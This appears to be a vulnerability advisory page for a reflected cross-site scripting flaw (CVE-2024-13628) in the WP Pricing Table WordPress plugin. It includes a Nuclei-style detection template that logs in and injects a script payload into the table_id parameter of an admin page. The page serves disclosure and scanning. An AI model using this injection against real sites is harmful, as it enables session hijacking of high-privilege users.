CVE-2024-13628: WP Pricing Table - Reflected XSS

2026-02-24 WP Pricing Table PoC Public

Description

WP Pricing Table WordPress plugin <= 1.1 contains a reflected cross-site scripting caused by unsanitized parameter output, letting attackers execute scripts in the context of high privilege users, exploit requires attacker to craft malicious URL.

PoC

id: CVE-2024-13628

info:
  name: WP Pricing Table - Reflected XSS
  author: Sourabh-Sahu
  severity: medium
  description: |
    WP Pricing Table WordPress plugin <= 1.1 contains a reflected cross-site scripting caused by unsanitized parameter output, letting attackers execute scripts in the context of high privilege users, exploit requires attacker to craft malicious URL.
  impact: |
    Attackers can execute arbitrary scripts in the context of high privilege users, potentially leading to session hijacking or account compromise.
  remediation: |
    Update to the latest version of WP Pricing Table plugin that addresses the vulnerability or apply security patches.
  reference:
    - https://wpscan.com/vulnerability/34d6c8a2-e70d-485c-a217-4a569c16b079/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-13628
    cwe-id: CWE-79
    epss-score: 0.0064
    epss-percentile: 0.48976
    cpe: cpe:2.3:a:codecabin:wp_pricing_table:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    publicwww-query: "/plugins/wp-pricing-table/"
  tags: cve,cve2024,codecabin,wp-pricing-table,wordpress,wp,wp-plugin,authenticated,xss

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=

    matchers:
      - type: dsl
        dsl:
          - contains(header, "wordpress_logged_in")
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=wp-pricing-table-menu&action=new&table_id=1"></script><script>alert(document.domain)</script><script> HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "></script><script>alert(document.domain)</script><script>","wp-pricing-table")
        condition: and
# digest: 4a0a00473045022100e0d6de50a960023e2de99c6ab05c8a634ae0b03d8b9fe5af75ebb04c8f33792902203ad72a99cf6eebf2619780130329261a30c17a853e4aa7a92792b3273bc34ed4:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities